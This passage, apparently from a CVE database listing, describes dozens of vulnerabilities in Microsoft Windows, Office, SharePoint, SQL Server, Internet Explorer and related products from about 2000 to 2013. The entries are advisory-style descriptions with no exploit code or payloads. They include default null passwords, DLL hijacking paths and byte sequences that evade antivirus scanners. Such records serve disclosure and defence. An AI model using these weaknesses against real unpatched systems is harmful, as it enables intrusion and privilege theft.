cause a denial of service via malformed inputs. [CVE-2001-0505] Multiple memory leaks in Microsoft Services for Unix 2.0 allow remote attackers to cause a denial of service (memory exhaustion) via a large number of malformed requests to (1) the Telnet service, or (2) the NFS service. [CVE-2001-0504] Vulnerability in authentication process for SMTP service in Microsoft Windows 2000 allows remote attackers to use incorrect credentials to gain privileges and conduct activites such as mail relaying. [CVE-2001-0501] Microsoft Word 2002 and earlier allows attackers to automatically execute macros without warning the user by embedding the macros in a manner that escapes detection by the security scanner. [CVE-2001-0351] Microsoft Windows 2000 telnet service allows a local user to make a certain system call that allows the user to terminate a Telnet session and cause a denial of service. [CVE-2001-0350] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the second of two variants of this vulnerability. [CVE-2001-0349] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the first of two variants of this vulnerability. [CVE-2001-0348] Microsoft Windows 2000 telnet service allows attackers to cause a denial of service (crash) via a long logon command that contains a backspace. [CVE-2001-0347] Information disclosure vulnerability in Microsoft Windows 2000 telnet service allows remote attackers to determine the existence of user accounts such as Guest, or log in to the server without specifying the domain name, via a malformed userid. [CVE-2001-0346] Handle leak in Microsoft Windows 2000 telnet service allows attackers to cause a denial of service by starting a large number of sessions and terminating them. [CVE-2001-0345] Microsoft Windows 2000 telnet service allows attackers to prevent idle Telnet sessions from timing out, causing a denial of service by creating a large number of idle sessions. [CVE-2001-0344] An SQL query method in Microsoft SQL Server 2000 Gold and 7.0 using Mixed Mode allows local database users to gain privileges by reusing a cached connection of the sa administrator account. [CVE-2001-0340] An interaction between the Outlook Web Access (OWA) service in Microsoft Exchange 2000 Server and Internet Explorer allows attackers to execute malicious script code against a user's mailbox via a message attachment that contains HTML code, which is executed automatically. [CVE-2001-0261] Microsoft Windows 2000 Encrypted File System does not properly destroy backups of files that are encrypted, which allows a local attacker to recover the text of encrypted files. [CVE-2001-0245] Microsoft Index Server 2.0 in Windows NT 4.0, and Indexing Service in Windows 2000, allows remote attackers to read server-side include files via a malformed search request, aka a new variant of the "Malformed Hit-Highlighting" vulnerability. [CVE-2001-0244] Buffer overflow in Microsoft Index Server 2.0 allows remote attackers to execute arbitrary commands via a long search parameter. [CVE-2001-0240] Microsoft Word before Word 2002 allows attackers to automatically execute macros without warning the user via a Rich Text Format (RTF) document that links to a template with the embedded macro. [CVE-2001-0239] Microsoft Internet Security and Acceleration (ISA) Server 2000 Web Proxy allows remote attackers to cause a denial of service via a long web request with a specific type. [CVE-2001-0237] Memory leak in Microsoft 2000 domain controller allows remote attackers to cause a denial of service by repeatedly connecting to the Kerberos service and then disconnecting without sending any data. [CVE-2001-0146] IIS 5.0 and Microsoft Exchange 2000 allow remote attackers to cause a denial of service (memory allocation error) by repeatedly sending a series of specially formatted URL's. [CVE-2001-0048] The "Configure Your Server" tool in Microsoft 2000 domain controllers installs a blank password for the Directory Service Restore Mode, which allows attackers with physical access to the controller to install malicious programs, aka the "Directory Service Restore Mode Password" vulnerability. [CVE-2001-0005] Buffer overflow in the parsing mechanism of the file loader in Microsoft PowerPoint 2000 allows attackers to execute arbitrary commands. [CVE-2001-0003] Web Extender Client (WEC) in Microsoft Office 2000, Windows 2000, and Windows Me does not properly process Internet Explorer security settings for NTLM authentication, which allows attackers to obtain NTLM credentials and possibly obtain the password, aka the "Web Client NTLM Authentication" vulnerability. [CVE-2000-1218] The default configuration for the domain name resolver for Microsoft Windows 98, NT 4.0, 2000, and XP sets the QueryIpMatching parameter to 0, which causes Windows to accept DNS updates from hosts that it did not query, which allows remote attackers to poison the DNS cache. [CVE-2000-1217] Microsoft Windows 2000 before Service Pack 2 (SP2), when running in a non-Windows 2000 domain and using NTLM authentication, and when credentials of an account are locally cached, allows local users to bypass account lockout policies and make an unlimited number of login attempts, aka the "Domain Account Lockout" vulnerability. [CVE-2000-1209] The "sa" account is installed with a default null password on (1) Microsoft SQL Server 2000, (2) SQL Server 7.0, and (3) Data Engine (MSDE) 1.0, including third party packages that use these products such as (4) Tumbleweed Secure Mail (MMS) (5) Compaq Insight Manager, and (6) Visio 2000, which allows remote attackers to gain privileges, as exploited by worms such as Voyager Alpha Force and Spida. [CVE-2000-1139] The installation of Microsoft Exchange 2000 before Rev. A creates a user account with a known password, which could allow attackers to gain privileges, aka the "Exchange User Account" vulnerability. [CVE-2000-1088] The xp_SetSQLSecurity function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1087] The xp_proxiedmetadata function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1086] The xp_printstatements function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1085] The xp_peekqueue function in Microsoft SQL Server 2000 and SQL Server Desktop Engine (MSDE) does not properly restrict the length of a buffer before calling the srv_paraminfo function in the SQL Server API for Extended Stored Procedures (XP), which allows an attacker to cause a denial of service or execute arbitrary commands, aka the "Extended Stored Procedure Parameter Parsing" vulnerability. [CVE-2000-1079] Interactions between the CIFS Browser Protocol and NetBIOS as implemented in Microsoft Windows 95, 98, NT, and 2000 allow remote attackers to modify dynamic NetBIOS name cache entries via a spoofed Browse Frame Request in a unicast or UDP broadcast datagram. [CVE-2000-0942] The CiWebHitsFile component in Microsoft Indexing Services for Windows 2000 allows remote attackers to conduct a cross site scripting (CSS) attack via a CiRestriction parameter in a .htw request, aka the "Indexing Services Cross Site Scripting" vulnerability. [CVE-2000-0854] When a Microsoft Office 2000 document is launched, the directory of that document is first used to locate DLL's such as riched20.dll and msi.dll, which could allow an attacker to execute arbitrary commands by inserting a Trojan Horse DLL into the same directory as the document. [CVE-2000-0771] Microsoft Windows 2000 allows local users to cause a denial of service by corrupting the local security policy via malformed RPC traffic, aka the "Local Security Policy Corruption" vulnerability. [CVE-2000-0765] Buffer overflow in the HTML interpreter in Microsoft Office 2000 allows an attacker to execute arbitrary commands via a long embedded object tag, aka the "Microsoft Office HTML Object Tag" vulnerability. [CVE-2000-0756] Microsoft Outlook 2000 does not properly process long or malformed fields in vCard (.vcf) files, which allows attackers to cause a denial of service. [CVE-2000-0710] The shtml.exe component of Microsoft FrontPage 2000 Server Extensions 1.1 allows remote attackers determine the physical path of the server components by requesting an invalid URL whose name includes a standard DOS device name. [CVE-2000-0709] The shtml.exe component of Microsoft FrontPage 2000 Server Extensions 1.1 allows remote attackers to cause a denial of service in some components by requesting a URL whose name includes a standard DOS device name. [CVE-2000-0637] Microsoft Excel 97 and 2000 allows an attacker to execute arbitrary commands by specifying a malicious .dll using the Register.ID function, aka the "Excel REGISTER.ID Function" vulnerability. [CVE-2000-0621] Microsoft Outlook 98 and 2000, and Outlook Express 4.0x and 5.0x, allow remote attackers to read files on the client's system via a malformed HTML message that stores files outside of the cache, aka the "Cache Bypass" vulnerability. [CVE-2000-0597] Microsoft Office 2000 (Excel and PowerPoint) and PowerPoint 97 are marked as safe for scripting, which allows remote attackers to force Internet Explorer or some email clients to save files to arbitrary locations via the Visual Basic for Applications (VBA) SaveAs function, aka the "Office HTML Script" vulnerability. [CVE-2000-0331] Buffer overflow in Microsoft command processor (CMD.EXE) for Windows NT and Windows 2000 allows a local user to cause a denial of service via a long environment variable, aka the "Malformed Environment Variable" vulnerability. [CVE-2000-0277] Microsoft Excel 97 and 2000 does not warn the user when executing Excel Macro Language (XLM) macros in external text files, which could allow an attacker to execute a macro virus, aka the "XLM Text Macro" vulnerability. [CVE-2013-2557] The sandbox protection mechanism in Microsoft Internet Explorer 9 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, as demonstrated against Adobe Flash Player by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-2556] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR protection mechanism via unknown vectors, as demonstrated against Adobe Flash Player by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-2554] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR and DEP protection mechanisms via unknown vectors, as demonstrated against Firefox by VUPEN during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0787. [CVE-2013-2553] Unspecified vulnerability in the kernel in Microsoft Windows 7 allows local users to gain privileges via unknown vectors, as demonstrated by Nils and Jon of MWR Labs during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0912. [CVE-2013-2552] Unspecified vulnerability in Microsoft Internet Explorer 10 on Windows 8 allows remote attackers to bypass the sandbox protection mechanism by leveraging access to a Medium integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-2551] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1308 and CVE-2013-1309. [CVE-2013-1347] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly allocated or (2) is deleted, as exploited in the wild in May 2013. [CVE-2013-1305] HTTP.sys in Microsoft Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP header, aka "HTTP.sys Denial of Service Vulnerability." [CVE-2013-1290] Microsoft SharePoint Server 2013, in certain configurations involving legacy My Sites, does not properly establish default access controls for a SharePoint list, which allows remote authenticated users to bypass intended restrictions on reading list items via a direct request for a list's location, aka "Incorrect Access Rights Information Disclosure Vulnerability." [CVE-2013-1289] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 SP1, Groove Server 2010 SP1, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability." [CVE-2013-1284] Race condition in the kernel in Microsoft Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-0096] Writer in Microsoft Windows Essentials 2011 and 2012 allows remote attackers to bypass proxy settings and overwrite arbitrary files via crafted URL parameters, aka "Windows Essentials Improper URI Handling Vulnerability." [CVE-2013-0086] Microsoft OneNote 2010 SP1 does not properly determine buffer sizes during memory allocation, which allows remote attackers to obtain sensitive information via a crafted OneNote file, aka "Buffer Size Validation Vulnerability." [CVE-2013-0085] Buffer overflow in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to cause a denial of service (W3WP process crash and site outage) via a crafted URL, aka "Buffer Overflow Vulnerability." [CVE-2013-0084] Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability." [CVE-2013-0083] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via crafted content, leading to administrative command execution, aka "SharePoint XSS Vulnerability." [CVE-2013-0080] Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allow remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "Callback Function Vulnerability." [CVE-2013-0079] Microsoft Visio Viewer 2010 SP1 allows remote attackers to execute arbitrary code via a crafted Visio file that triggers incorrect memory allocation, aka "Visio Viewer Tree Object Type Confusion Vulnerability." [CVE-2013-0005] The WCF Replace function in the Open Data (aka OData) protocol implementation in Microsoft .NET Framework 3.5, 3.5 SP1, 3.5.1, and 4, and the Management OData IIS Extension on Windows Server 2012, allows remote attackers to cause a denial of service (resource consumption and daemon restart) via crafted values in HTTP requests, aka "Replace Denial of Service Vulnerability." [CVE-2012-4969] Use-after-free vulnerability in the CMshtmlEd::Exec function in mshtml.dll in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site, as exploited in the wild in September 2012. [CVE-2012-4792] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object, and exploited in the wild in December 2012. [CVE-2012-3456] Heap-based buffer overflow in the read function in filters/words/msword-odf/wv2/src/styles.cpp in the Microsoft import filter in Calligra 2.4.3 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted ODF style in an ODF document. NOTE: this is the same vulnerability as CVE-2012-3455, but it was SPLIT by the CNA even though Calligra and KOffice share the same codebase. [CVE-2012-3455] Heap-based buffer overflow in the read function in filters/words/msword-odf/wv2/src/styles.cpp in the Microsoft import filter in KOffice 2.3.3 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted ODF style in an ODF document. NOTE: this is the same vulnerability as CVE-2012-3456, but it was SPLIT by the CNA even though Calligra and KOffice share the same codebase. [CVE-2012-2290] The client in EMC NetWorker Module for Microsoft Applications (NMM) 2.2.1, 2.3 before build 122, and 2.4 before build 375 allows remote attackers to execute arbitrary code by sending a crafted message over a TCP communication channel. [CVE-2012-2284] The (1) install and (2) upgrade processes in EMC NetWorker Module for Microsoft Applications (NMM) 2.2.1, 2.3 before build 122, and 2.4 before build 375, when Exchange Server is used, allow local users to read cleartext administrator credentials via unspecified vectors. [CVE-2012-1945] Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10 allow local users to obtain sensitive information via an HTML document that loads a shortcut (aka .lnk) file for display within an IFRAME element, as demonstrated by a network share implemented by (1) Microsoft Windows or (2) Samba. [CVE-2012-1894] Microsoft Office for Mac 2011 uses world-writable permissions for the "Applications/Microsoft Office 2011/" directory and certain other directories, which allows local users to gain privileges by placing a Trojan horse executable file in one of these directories, aka "Office for Mac Improper Folder Permissions Vulnerability." [CVE-2012-1892] Cross-site scripting (XSS) vulnerability in Microsoft Visual Studio Team Foundation Server 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "XSS Vulnerability." [CVE-2012-1891] Heap-based buffer overflow in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2 and Windows Data Access Components (WDAC) 6.0 allows remote attackers to execute arbitrary code via crafted XML data that triggers access to an uninitialized object in memory, aka "ADO Cachesize Heap Overflow RCE Vulnerability." [CVE-2012-1888] Buffer overflow in Microsoft Visio 2010 SP1 and Visio Viewer 2010 SP1 allows remote attackers to execute arbitrary code via a crafted Visio file, aka "Visio DXF File Format Buffer Overflow Vulnerability." [CVE-2012-1876] Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by attempting to access a nonexistent object, leading to a heap-based buffer overflow, aka "Col Element Remote Code Execution Vulnerability," as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012. [CVE-2012-1861] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 Gold and SP1, SharePoint Foundation 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Script in Username Vulnerability." [CVE-2012-1859] Cross-site scripting (XSS) vulnerability in scriptresx.ashx in Microsoft SharePoint Server 2010 Gold and SP1, SharePoint Foundation 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "XSS scriptresx.ashx Vulnerability." [CVE-2012-1857] Cross-site scripting (XSS) vulnerability in the Enterprise Portal component in Microsoft Dynamics AX 2012 allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka "Dynamics AX Enterprise Portal XSS Vulnerability." [CVE-2012-1849] Untrusted search path vulnerability in Microsoft Lync 2010, 2010 Attendee, and 2010 Attendant allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .ocsmeet file, aka "Lync Insecure Library Loading Vulnerability." [CVE-2012-1545] Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012. [CVE-2012-1436] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \2D\6C\68 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1435] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \50\4B\4C\49\54\45 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1434] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \19\04\00\10 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1433] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \4a\46\49\46 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-0447] Mozilla Firefox 4.x through 9.0, Thunderbird 5.0 through 9.0, and SeaMonkey before 2.7 do not properly initialize data for image/vnd.microsoft.icon images, which allows remote attackers to obtain potentially sensitive information by reading a PNG image that was created through conversion from an ICO image. [CVE-2012-0147] Microsoft Forefront Unified Access Gateway (UAG) 2010 SP1 and SP1 Update 1 does not properly configure the default web site, which allows remote attackers to obtain sensitive information via a crafted HTTPS request, aka "Unfiltered Access to UAG Default Website Vulnerability." [CVE-2012-0146] Open redirect vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 SP1 and SP1 Update 1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka "UAG Blind HTTP Redirect Vulnerability." [CVE-2012-0145] Cross-site scripting (XSS) vulnerability in wizardlist.aspx in Microsoft Office SharePoint Server 2010 Gold and SP1 and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in wizardlist.aspx Vulnerability." [CVE-2012-0144] Cross-site scripting (XSS) vulnerability in themeweb.aspx in Microsoft Office SharePoint Server 2010 Gold and SP1 and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in themeweb.aspx Vulnerability." [CVE-2012-0138] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0020, CVE-2012-0136, and CVE-2012-0137. [CVE-2012-0137] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0020, CVE-2012-0136, and CVE-2012-0138. [CVE-2012-0136] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0020, CVE-2012-0137, and CVE-2012-0138. [CVE-2012-0020] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0136, CVE-2012-0137, and CVE-2012-0138. [CVE-2012-0019] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0020, CVE-2012-0136, CVE-2012-0137, and CVE-2012-0138. [CVE-2012-0018] Microsoft Visio Viewer 2010 Gold and SP1 does not properly validate attributes in Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "VSD File Format Memory Corruption Vulnerability." [CVE-2012-0017] Cross-site scripting (XSS) vulnerability in inplview.aspx in Microsoft SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in inplview.aspx Vulnerability." [CVE-2011-4695] Unspecified vulnerability in Microsoft Windows 7 SP1, when Java is installed, allows local users to bypass Internet Explorer sandbox restrictions and gain privileges via unknown vectors, as demonstrated by the White Phosphorus wp_ie_sandbox_escape module for Immunity CANVAS. NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2011-2012] Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 does not properly validate session cookies, which allows remote attackers to cause a denial of service (IIS outage) via unspecified network traffic, aka "Null Session Cookie Crash." [CVE-2011-2010] The Microsoft Office Input Method Editor (IME) for Simplified Chinese in Microsoft Pinyin IME 2010, Office Pinyin SimpleFast Style 2010, and Office Pinyin New Experience Style 2010 does not properly restrict access to configuration options, which allows local users to gain privileges via the Microsoft Pinyin (aka MSPY) IME toolbar, aka "Pinyin IME Elevation Vulnerability." [CVE-2011-1969] Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 provides the MicrosoftClient.jar file containing a signed Java applet, which allows remote attackers to execute arbitrary code on client machines via unspecified vectors, aka "Poisoned Cup of Code Execution Vulnerability." [CVE-2011-1897] Cross-site scripting (XSS) vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Default Reflected XSS Vulnerability." [CVE-2011-1896] Cross-site scripting (XSS) vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "ExcelTable Reflected XSS Vulnerability." [CVE-2011-1895] CRLF injection vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary HTTP headers, and conduct HTTP response splitting attacks and cross-site scripting (XSS) attacks, via unspecified vectors, aka "ExcelTable Response Splitting XSS Vulnerability." [CVE-2011-1891] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in a request to a script, aka "Contact Details Reflected XSS Vulnerability." [CVE-2011-1890] Cross-site scripting (XSS) vulnerability in EditForm.aspx in Microsoft Office SharePoint Server 2010 and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via a post, aka "Editform Script Injection Vulnerability." [CVE-2011-1889] The NSPLookupServiceNext function in the client in Microsoft Forefront Threat Management Gateway (TMG) 2010 allows remote attackers to execute arbitrary code via vectors involving unspecified requests, aka "TMG Firewall Client Memory Corruption Vulnerability." [CVE-2011-1417] Integer overflow in QuickLook, as used in Apple Mac OS X before 10.6.7 and MobileSafari in Apple iOS before 4.2.7 and 4.3.x before 4.3.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a Microsoft Office document with a crafted size field in the OfficeArtMetafileHeader, related to OfficeArtBlip, as demonstrated on the iPhone by Charlie Miller and Dion Blazakis during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1347] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to bypass Protected Mode and create arbitrary files by leveraging access to a Low integrity process, as demonstrated by Stephen Fewer as the third of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1346] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, as demonstrated by Stephen Fewer as the second of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1345] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, as demonstrated by Stephen Fewer as the first of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011, aka "Object Management Memory Corruption Vulnerability." [CVE-2011-1265] The Bluetooth Stack 2.1 in Microsoft Windows Vista SP1 and SP2 and Windows 7 Gold and SP1 does not prevent access to objects in memory that (1) were not properly initialized or (2) have been deleted, which allows remote attackers to execute arbitrary code via crafted Bluetooth packets, aka "Bluetooth Stack Vulnerability." [CVE-2011-0653] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010 Gold and SP1, and SharePoint Foundation 2010, allows remote attackers to inject arbitrary web script or HTML via the URI, aka "XSS in SharePoint Calendar Vulnerability." [CVE-2011-0647] The irccd.exe service in EMC Replication Manager Client before 5.3 and NetWorker Module for Microsoft Applications 2.1.x and 2.2.x allows remote attackers to execute arbitrary commands via the RunProgram function to TCP port 6542. [CVE-2011-0627] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content, as possibly exploited in the wild in May 2011 by a Microsoft Office document with an embedded .swf file. [CVE-2011-0037] Microsoft Malware Protection Engine before 1.1.6603.0, as used in Microsoft Malicious Software Removal Tool (MSRT), Windows Defender, Security Essentials, Forefront Client Security, Forefront Endpoint Protection 2010, and Windows Live OneCare, allows local users to gain privileges via a crafted value of an unspecified user registry key. [CVE-2011-0027] Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, does not properly validate memory allocation for internal data structures, which allows remote attackers to execute arbitrary code, possibly via a large CacheSize property that triggers an integer wrap and a buffer overflow, aka "ADO Record Memory Vulnerability." NOTE: this might be a duplicate of CVE-2010-1117 or CVE-2010-1118. [CVE-2011-0026] Integer signedness error in the SQLConnectW function in an ODBC API (odbc32.dll) in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, allows remote attackers to execute arbitrary code via a long string in the Data Source Name (DSN) and a crafted szDSN argument, which bypasses a signed comparison and leads to a buffer overflow, aka "DSN Overflow Vulnerability." [CVE-2010-4643] Heap-based buffer overflow in Impress in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted Truevision TGA (TARGA) file in an ODF or Microsoft Office document. [CVE-2010-4253] Heap-based buffer overflow in Impress in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PNG file in an ODF or Microsoft Office document, as demonstrated by a PowerPoint (aka PPT) document. [CVE-2010-4121] DISPUTED The TCP-to-ODBC gateway in IBM Tivoli Provisioning Manager for OS Deployment 7.1.1.3 does not require authentication for SQL statements, which allows remote attackers to modify, create, or read database records via a session on TCP port 2020. NOTE: the vendor disputes this issue, stating that the "default Microsoft Access database is not password protected because it is intended to be used for evaluation purposes only." [CVE-2010-3967] Untrusted search path vulnerability in Microsoft Windows Movie Maker (WMM) 2.6 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Movie Maker (MSWMM) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3962] Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Cascading Style Sheets (CSS) token sequences and the clip attribute, aka an "invalid flag reference" issue or "Uninitialized Memory Corruption Vulnerability," as exploited in the wild in November 2010. [CVE-2010-3936] Cross-site scripting (XSS) vulnerability in Signurl.asp in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "XSS in Signurl.asp Vulnerability." [CVE-2010-3889] Unspecified 